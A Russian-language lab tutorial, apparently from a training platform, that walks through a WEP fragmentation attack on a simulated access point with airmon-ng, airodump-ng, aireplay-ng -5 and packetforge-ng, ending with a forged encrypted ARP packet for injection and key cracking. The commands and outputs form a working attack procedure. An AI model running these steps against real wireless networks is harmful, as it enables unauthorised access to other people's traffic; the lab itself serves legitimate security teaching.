Введение
В этой лабораторной работе вы научитесь выполнять атаку фрагментации против сети, зашифрованной с помощью WEP (Wired Equivalent Privacy). Атака фрагментации — это техника, которая позволяет злоумышленнику получить небольшое количество потока ключей WEP (в частности, алгоритма генерации псевдослучайных чисел или PRGA) без знания самого ключа WEP.
После получения этого потока ключей его можно использовать для создания новых, действительных зашифрованных пакетов. Эти поддельные пакеты затем могут быть внедрены обратно в сеть для стимулирования трафика, что является критически важным шагом в подборе полного ключа WEP.
Для выполнения этой задачи вы будете использовать набор инструментов aircrack-ng. Процесс включает мониторинг целевой сети, запуск атаки фрагментации для получения файла XOR PRGA, а затем использование этого файла для подделки ARP-пакета.
Получение пакета данных от целевой точки доступа с помощью airodump-ng
На этом этапе вы подготовите ваш беспроводной интерфейс для мониторинга, а затем используете airodump-ng для захвата трафика от целевой точки доступа (AP). Цель — захватить как минимум один пакет данных, который необходим для атаки фрагментации.
Сначала вам нужно перевести ваш беспроводной интерфейс в режим мониторинга. Этот режим позволяет сетевой карте прослушивать весь Wi-Fi трафик в эфире, а не только трафик, адресованный ей. Мы будем использовать команду airmon-ng на интерфейсе wlan1.
Выполните следующую команду в вашем терминале:
sudo airmon-ng start wlan1
Эта команда создаст новый интерфейс в режиме мониторинга, обычно называемый wlan1mon. Вывод подтвердит имя нового интерфейса.
PHY Interface Driver Chipset
phy1 wlan1 mac80211_hwsim Software simulator
(monitor mode enabled on wlan1mon)
Теперь используйте airodump-ng для поиска нашей целевой точки доступа "TestWEP" и захвата ее трафика в файл. Мы укажем BSSID (02:00:00:00:00:00), канал (1) и префикс файла (capture) для выходных файлов.
Запустите эту команду. Дайте ей поработать примерно 30-60 секунд, пока вы не увидите, что счетчик #Data для точки доступа увеличивается, что указывает на захват пакетов данных.
sudo airodump-ng --bssid 02:00:00:00:00:00 -c 1 -w capture wlan1mon
Вы увидите вывод, похожий на этот. Дождитесь, пока в столбце #Data появится значение больше 0.
CH 1 ][ Elapsed: 30 s ][ 2023-10-27 10:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:00:00 -30 25 5 1 1 54 WEP WEP TestWEP
BSSID STATION PWR Rate Lost Frames Probe
Как только вы увидите, что пакеты данных были захвачены, нажмите Ctrl+C, чтобы остановить airodump-ng. Вы можете использовать команду ls, чтобы увидеть сгенерированный файл захвата, который будет называться capture-01.cap.
Запуск атаки фрагментации с помощью aireplay-ng -5
На этом этапе вы запустите атаку фрагментации с помощью aireplay-ng. Эта атака прослушивает пакет от целевой точки доступа и, как только она его захватит, использует его для попытки определения потока ключей PRGA.
Команда для этой атаки — aireplay-ng -5. Вам нужно указать BSSID целевой точки доступа с помощью флага -b и имя вашего интерфейса мониторинга.
Выполните следующую команду для запуска атаки.
sudo aireplay-ng -5 -b 02:00:00:00:00:00 wlan1mon
После выполнения команды aireplay-ng начнет прослушивать подходящий пакет. В терминале появится сообщение о том, что он ожидает.
Waiting for a data packet...
Read 221 packets...
Инструмент продолжит чтение пакетов до тех пор, пока не найдет тот, который можно использовать для атаки. На следующем шаге вы будете взаимодействовать с этим процессом, как только подходящий пакет будет найден. Пока просто дайте ему работать.
Ожидание сообщения 'Use this packet' от aircrack-ng
На этом этапе вы продолжите процесс, начатый с помощью aireplay-ng. Через некоторое время aireplay-ng должен захватить пригодный для использования пакет и запросить у вас подтверждение.
Инструмент отобразит детали пакета и спросит, хотите ли вы его использовать.
Waiting for a data packet...
Read 280 packets...
A suitable packet found!
Size: 68
1. Use this packet? (y/n)
Когда вы увидите запрос Use this packet? (y/n), введите y и нажмите Enter.
y
После подтверждения aireplay-ng попытается восстановить PRGA из пакета. В случае успеха он сохранит поток ключей в файл с расширением .xor в вашей текущей директории (~/project). Вывод будет выглядеть примерно так:
Saving chosen packet to replay_src-1027-100500.cap
Trying to get 68 bytes of keystream
Got keystream!!
Saved keystream in fragment-1027-100501.xor
Now you can build a packet with packetforge-ng
Это подтверждает, что атака была успешной и поток ключей был сохранен. Файл .xor является ключом для создания новых пакетов.
Генерация файла PRGA XOR из успешной атаки
На этом этапе вы подтвердите, что файл потока ключей PRGA был успешно создан атакой фрагментации. Этот файл, имеющий расширение .xor, содержит часть восстановленного нами потока ключей.
Как вы видели в выводе предыдущего шага, aireplay-ng автоматически сохраняет файл. Вы можете проверить его наличие, используя команду ls -l для вывода списка файлов в текущей директории.
ls -l
В выводе должны отображаться несколько файлов, включая файл capture-01.cap из airodump-ng и, что наиболее важно, новый файл .xor. Имя файла будет варьироваться в зависимости от даты и времени.
total 20
-rw-r--r-- 1 root root 119 Oct 27 10:02 capture-01.cap
-rw-r--r-- 1 root root 68 Oct 27 10:05 fragment-1027-100501.xor
-rw-r--r-- 1 root root 114 Oct 27 10:01 hostapd-wep.conf
-rw-r--r-- 1 root root 96 Oct 27 10:05 replay_src-1027-100500.cap
Наличие файла fragment-*.xor подтверждает, что у вас есть необходимый компонент для создания нового пакета на следующем шаге.
Использование файла XOR для создания ARP-пакетов для инъекции
На этом этапе вы будете использовать восстановленный поток ключей PRGA для создания нового пакета. Мы создадим пакет ARP-запроса с помощью packetforge-ng. Этот созданный пакет затем может быть внедрен в сеть для генерации большего трафика, что полезно для других атак, таких как взлом ключа WEP.
Сначала вам нужно узнать MAC-адрес вашего атакующего интерфейса (wlan1). Вы можете найти его с помощью команды ip addr.
ip addr show wlan1
В выводе будет показан ваш MAC-адрес. В этой симулированной среде он равен 02:00:00:00:01:00.
3: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
Теперь составьте команду packetforge-ng.
-0: Указывает на пакет ARP-запроса.-a: BSSID целевой точки доступа (02:00:00:00:00:00).-h: Исходный MAC-адрес (ваш MAC,02:00:00:00:01:00).-k: IP-адрес назначения (мы будем использовать общий широковещательный IP,192.168.1.255).-l: Исходный IP-адрес (мы будем использовать общий исходный IP,192.168.1.100).-y: Путь к файлу.xor. Мы можем использовать$(ls *.xor)для автоматического использования файла.-w: Имя выходного файла для нашего созданного пакета, например,arp-packet.cap.
Выполните команду:
packetforge-ng -0 -a 02:00:00:00:00:00 -h 02:00:00:00:01:00 -k 192.168.1.255 -l 192.168.1.100 -y $(ls *.xor) -w arp-packet.cap
Инструмент подтвердит, что он создал пакет.
Wrote packet to arp-packet.cap
Теперь вы успешно создали действительный, зашифрованный ARP-пакет, не зная ключа WEP. Вы можете проверить его создание с помощью ls. Этот пакет теперь готов к внедрению в сеть.
Резюме
В этой лабораторной работе вы успешно выполнили атаку фрагментации WEP. Вы освоили фундаментальную технику анализа устаревшей безопасности Wi-Fi.
Вы начали с настройки интерфейса в режиме мониторинга с помощью airmon-ng и захвата пакетов данных с целевой точки доступа с помощью airodump-ng. Затем вы запустили основную атаку фрагментации с помощью aireplay-ng -5, что позволило вам восстановить часть потока ключей WEP.
Наконец, вы использовали восстановленный поток ключей и packetforge-ng для создания с нуля пользовательского, зашифрованного пакета ARP-запроса. Этот созданный пакет является критически важным инструментом для более продвинутых атак, таких как атаки повторного воспроизведения ARP-запросов, которые быстро генерируют тысячи пакетов, необходимых для взлома ключа WEP.